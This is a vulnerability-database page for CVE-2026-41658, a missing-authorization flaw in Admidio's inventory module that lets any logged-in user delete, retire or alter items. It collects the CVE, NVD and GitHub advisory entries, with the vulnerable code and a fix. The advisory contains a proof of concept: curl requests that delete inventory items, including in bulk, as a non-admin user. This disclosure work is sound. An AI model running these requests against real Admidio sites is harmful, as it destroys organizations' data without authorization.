Vulnerability-Lookup

CVE-2026-41658 (GCVE-0-2026-41658)

Vulnerability from cvelistv5 – Published: 2026-05-07 02:58 – Updated: 2026-05-07 13:56

Title

Admidio: Missing Authorization on Inventory Module Destructive Endpoints Allows Any Authenticated User to Delete Items

Summary

Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-862 - Missing Authorization

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/Admidio/admidio/security/advis…	x_refsource_CONFIRM
https://github.com/Admidio/admidio/releases/tag/v5.0.9	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
Admidio	admidio	Affected: < 5.0.9

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-41658",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-07T13:55:45.594183Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-07T13:56:16.154Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "admidio",
          "vendor": "Admidio",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 5.0.9"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862: Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-07T02:58:27.557Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv"
        },
        {
          "name": "https://github.com/Admidio/admidio/releases/tag/v5.0.9",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9"
        }
      ],
      "source": {
        "advisory": "GHSA-xqv4-xm7h-52cv",
        "discovery": "UNKNOWN"
      },
      "title": "Admidio: Missing Authorization on Inventory Module Destructive Endpoints Allows Any Authenticated User to Delete Items"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-41658",
    "datePublished": "2026-05-07T02:58:27.557Z",
    "dateReserved": "2026-04-21T23:58:43.803Z",
    "dateUpdated": "2026-05-07T13:56:16.154Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-41658",
      "date": "2026-05-17",
      "epss": "0.00029",
      "percentile": "0.08594"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-41658\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-07T04:16:29.407\",\"lastModified\":\"2026-05-07T15:16:08.150\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-862\"}]}],\"references\":[{\"url\":\"https://github.com/Admidio/admidio/releases/tag/v5.0.9\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41658\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-07T13:55:45.594183Z\"}}}], \"references\": [{\"url\": \"https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-07T13:55:05.261Z\"}}], \"cna\": {\"title\": \"Admidio: Missing Authorization on Inventory Module Destructive Endpoints Allows Any Authenticated User to Delete Items\", \"source\": {\"advisory\": \"GHSA-xqv4-xm7h-52cv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"Admidio\", \"product\": \"admidio\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 5.0.9\"}]}], \"references\": [{\"url\": \"https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv\", \"name\": \"https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/Admidio/admidio/releases/tag/v5.0.9\", \"name\": \"https://github.com/Admidio/admidio/releases/tag/v5.0.9\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-862\", \"description\": \"CWE-862: Missing Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-07T02:58:27.557Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-41658\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-07T13:56:16.154Z\", \"dateReserved\": \"2026-04-21T23:58:43.803Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-07T02:58:27.557Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-41658

Vulnerability from fkie_nvd - Published: 2026-05-07 04:16 - Updated: 2026-05-07 15:16

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/Admidio/admidio/releases/tag/v5.0.9
	security-advisories@github.com	https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9."
    }
  ],
  "id": "CVE-2026-41658",
  "lastModified": "2026-05-07T15:16:08.150",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-07T04:16:29.407",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-XQV4-XM7H-52CV

Vulnerability from github – Published: 2026-04-29 21:46 – Updated: 2026-05-08 20:13

Summary

Admidio's Missing Authorization on Inventory Module Destructive Endpoints Allows Any Authenticated User to Delete Items

Details

Summary

The Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data.

Details

The inventory module applies a module-level access control check at modules/inventory.php:65-72 that determines whether a user can access the inventory module at all, based on the inventory_module_enabled setting. In the default configuration (value 2), any logged-in user passes this check.

The item_delete handler at lines 381-397 only validates the CSRF token:

// modules/inventory.php:381-397
case 'item_delete':
    // check the CSRF token of the form against the session token
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);

    if (count($getItemUUIDs) > 0) {
        foreach ($getItemUUIDs as $itemUuid) {
            $itemService = new ItemService($gDb, $itemUuid);
            $itemService->delete();
        }
        echo json_encode(array('status' => 'success', 'message' => $gL10n->get('SYS_INVENTORY_SELECTION_DELETED')));
    } else {
        $itemService = new ItemService($gDb, $getiniUUID);
        $itemService->delete();
        echo json_encode(array('status' => 'success', 'message' => $gL10n->get('SYS_INVENTORY_ITEM_DELETED')));
    }
    break;

There is no call to $gCurrentUser->isAdministratorInventory() before executing the deletion. The service layer (ItemService::delete() at src/Inventory/Service/ItemService.php:86-92) and the data layer (ItemsData::deleteItem() at src/Inventory/ValueObjects/ItemsData.php:1078-1095) also contain no authorization checks — they directly execute DELETE FROM SQL statements on the item data, borrow data, and item tables.

Meanwhile, the UI does check admin status before showing delete buttons:

// modules/inventory.php:306-309 (UI only)
if ($gCurrentUser->isAdministratorInventory()) {
    $msg .= '<button id="adm_button_delete" ...>';
}

This creates a false sense of security — the button is hidden, but the endpoint is fully accessible. Item UUIDs needed for the attack are visible to all users who can view the inventory list.

The same missing-authorization pattern affects: - item_retire (line 347) — soft-retires items without admin check - item_reinstate (line 364) — reinstates retired items without admin check - item_picture_upload (line 428) — uploads pictures without admin check - item_picture_save (line 445) — saves pictures without admin check - item_picture_delete (line 457) — deletes pictures without admin check

PoC

Prerequisites: An Admidio instance with the inventory module enabled (default setting inventory_module_enabled=2), two user accounts — one admin who created inventory items, and one regular user with no inventory admin rights.

# Step 1: Log in as a regular (non-admin) user and get session cookie + CSRF token
# The CSRF token is embedded in any page the user can access
curl -c cookies.txt -b cookies.txt 'https://target/adm_program/modules/inventory.php?mode=item_list'

# Step 2: Extract a target item UUID from the inventory list page
# Item UUIDs are visible in the list view HTML to all users with module access

# Step 3: Permanently delete the item (as a non-admin user)
curl -X POST 'https://target/adm_program/modules/inventory.php?mode=item_delete&item_uuid=TARGET-ITEM-UUID' \
  -H 'Cookie: PHPSESSID=regular_user_session' \
  -d 'adm_csrf_token=EXTRACTED_CSRF_TOKEN'

# Expected response: {"status":"success","message":"Item deleted"}
# The item and all associated data (item fields, borrow records) are permanently deleted.

# Step 4: Bulk deletion is also possible
curl -X POST 'https://target/adm_program/modules/inventory.php?mode=item_delete&item_uuids[]=UUID1&item_uuids[]=UUID2&item_uuids[]=UUID3' \
  -H 'Cookie: PHPSESSID=regular_user_session' \
  -d 'adm_csrf_token=EXTRACTED_CSRF_TOKEN'

Impact

Data destruction: Any authenticated user can permanently delete any inventory item, including all associated field data and borrow records. There is no soft-delete or recycle bin — the SQL DELETE FROM statements are irreversible without database backups.
Bulk deletion: The endpoint accepts multiple item UUIDs, allowing an attacker to delete all inventory items in a single request.
Additional unauthorized operations: The same pattern allows non-admin users to retire/reinstate items and upload/modify/delete item pictures, undermining the entire inventory permission model.
Blast radius: In organizations using Admidio's inventory module to track physical assets, a disgruntled member or compromised low-privilege account could wipe the entire inventory database.

Recommended Fix

Add isAdministratorInventory() checks to all destructive inventory endpoints. The fix should be applied at the handler level in modules/inventory.php before any service calls:

// modules/inventory.php — Add authorization check to item_delete
case 'item_delete':
    // check the CSRF token of the form against the session token
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);

    // ADD THIS: check if user has admin rights for inventory
    if (!$gCurrentUser->isAdministratorInventory()) {
        throw new Exception('SYS_NO_RIGHTS');
    }

    if (count($getItemUUIDs) > 0) {
        // ... existing code

Apply the same pattern to item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete. Additionally, consider adding authorization checks in ItemService methods as defense-in-depth.

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.8"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "admidio/admidio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.0.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41658"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-29T21:46:23Z",
    "nvd_published_at": "2026-05-07T04:16:29Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at `modules/inventory.php` for `item_delete`, `item_retire`, `item_reinstate`, `item_picture_upload`, `item_picture_save`, and `item_picture_delete` perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data.\n\n## Details\n\nThe inventory module applies a module-level access control check at `modules/inventory.php:65-72` that determines whether a user can access the inventory module at all, based on the `inventory_module_enabled` setting. In the default configuration (value `2`), any logged-in user passes this check.\n\nThe `item_delete` handler at lines 381-397 only validates the CSRF token:\n\n```php\n// modules/inventory.php:381-397\ncase \u0027item_delete\u0027:\n    // check the CSRF token of the form against the session token\n    SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n\n    if (count($getItemUUIDs) \u003e 0) {\n        foreach ($getItemUUIDs as $itemUuid) {\n            $itemService = new ItemService($gDb, $itemUuid);\n            $itemService-\u003edelete();\n        }\n        echo json_encode(array(\u0027status\u0027 =\u003e \u0027success\u0027, \u0027message\u0027 =\u003e $gL10n-\u003eget(\u0027SYS_INVENTORY_SELECTION_DELETED\u0027)));\n    } else {\n        $itemService = new ItemService($gDb, $getiniUUID);\n        $itemService-\u003edelete();\n        echo json_encode(array(\u0027status\u0027 =\u003e \u0027success\u0027, \u0027message\u0027 =\u003e $gL10n-\u003eget(\u0027SYS_INVENTORY_ITEM_DELETED\u0027)));\n    }\n    break;\n```\n\nThere is no call to `$gCurrentUser-\u003eisAdministratorInventory()` before executing the deletion. The service layer (`ItemService::delete()` at `src/Inventory/Service/ItemService.php:86-92`) and the data layer (`ItemsData::deleteItem()` at `src/Inventory/ValueObjects/ItemsData.php:1078-1095`) also contain no authorization checks \u2014 they directly execute `DELETE FROM` SQL statements on the item data, borrow data, and item tables.\n\nMeanwhile, the UI **does** check admin status before showing delete buttons:\n\n```php\n// modules/inventory.php:306-309 (UI only)\nif ($gCurrentUser-\u003eisAdministratorInventory()) {\n    $msg .= \u0027\u003cbutton id=\"adm_button_delete\" ...\u003e\u0027;\n}\n```\n\nThis creates a false sense of security \u2014 the button is hidden, but the endpoint is fully accessible. Item UUIDs needed for the attack are visible to all users who can view the inventory list.\n\nThe same missing-authorization pattern affects:\n- `item_retire` (line 347) \u2014 soft-retires items without admin check\n- `item_reinstate` (line 364) \u2014 reinstates retired items without admin check\n- `item_picture_upload` (line 428) \u2014 uploads pictures without admin check\n- `item_picture_save` (line 445) \u2014 saves pictures without admin check\n- `item_picture_delete` (line 457) \u2014 deletes pictures without admin check\n\n## PoC\n\nPrerequisites: An Admidio instance with the inventory module enabled (default setting `inventory_module_enabled=2`), two user accounts \u2014 one admin who created inventory items, and one regular user with no inventory admin rights.\n\n```bash\n# Step 1: Log in as a regular (non-admin) user and get session cookie + CSRF token\n# The CSRF token is embedded in any page the user can access\ncurl -c cookies.txt -b cookies.txt \u0027https://target/adm_program/modules/inventory.php?mode=item_list\u0027\n\n# Step 2: Extract a target item UUID from the inventory list page\n# Item UUIDs are visible in the list view HTML to all users with module access\n\n# Step 3: Permanently delete the item (as a non-admin user)\ncurl -X POST \u0027https://target/adm_program/modules/inventory.php?mode=item_delete\u0026item_uuid=TARGET-ITEM-UUID\u0027 \\\n  -H \u0027Cookie: PHPSESSID=regular_user_session\u0027 \\\n  -d \u0027adm_csrf_token=EXTRACTED_CSRF_TOKEN\u0027\n\n# Expected response: {\"status\":\"success\",\"message\":\"Item deleted\"}\n# The item and all associated data (item fields, borrow records) are permanently deleted.\n\n# Step 4: Bulk deletion is also possible\ncurl -X POST \u0027https://target/adm_program/modules/inventory.php?mode=item_delete\u0026item_uuids[]=UUID1\u0026item_uuids[]=UUID2\u0026item_uuids[]=UUID3\u0027 \\\n  -H \u0027Cookie: PHPSESSID=regular_user_session\u0027 \\\n  -d \u0027adm_csrf_token=EXTRACTED_CSRF_TOKEN\u0027\n```\n\n## Impact\n\n- **Data destruction**: Any authenticated user can permanently delete any inventory item, including all associated field data and borrow records. There is no soft-delete or recycle bin \u2014 the SQL `DELETE FROM` statements are irreversible without database backups.\n- **Bulk deletion**: The endpoint accepts multiple item UUIDs, allowing an attacker to delete all inventory items in a single request.\n- **Additional unauthorized operations**: The same pattern allows non-admin users to retire/reinstate items and upload/modify/delete item pictures, undermining the entire inventory permission model.\n- **Blast radius**: In organizations using Admidio\u0027s inventory module to track physical assets, a disgruntled member or compromised low-privilege account could wipe the entire inventory database.\n\n## Recommended Fix\n\nAdd `isAdministratorInventory()` checks to all destructive inventory endpoints. The fix should be applied at the handler level in `modules/inventory.php` before any service calls:\n\n```php\n// modules/inventory.php \u2014 Add authorization check to item_delete\ncase \u0027item_delete\u0027:\n    // check the CSRF token of the form against the session token\n    SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n\n    // ADD THIS: check if user has admin rights for inventory\n    if (!$gCurrentUser-\u003eisAdministratorInventory()) {\n        throw new Exception(\u0027SYS_NO_RIGHTS\u0027);\n    }\n\n    if (count($getItemUUIDs) \u003e 0) {\n        // ... existing code\n```\n\nApply the same pattern to `item_retire`, `item_reinstate`, `item_picture_upload`, `item_picture_save`, and `item_picture_delete`. Additionally, consider adding authorization checks in `ItemService` methods as defense-in-depth.",
  "id": "GHSA-xqv4-xm7h-52cv",
  "modified": "2026-05-08T20:13:44Z",
  "published": "2026-04-29T21:46:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41658"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Admidio/admidio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Admidio\u0027s Missing Authorization on Inventory Module Destructive Endpoints Allows Any Authenticated User to Delete Items"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41658 (GCVE-0-2026-41658)

FKIE_CVE-2026-41658

GHSA-XQV4-XM7H-52CV

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature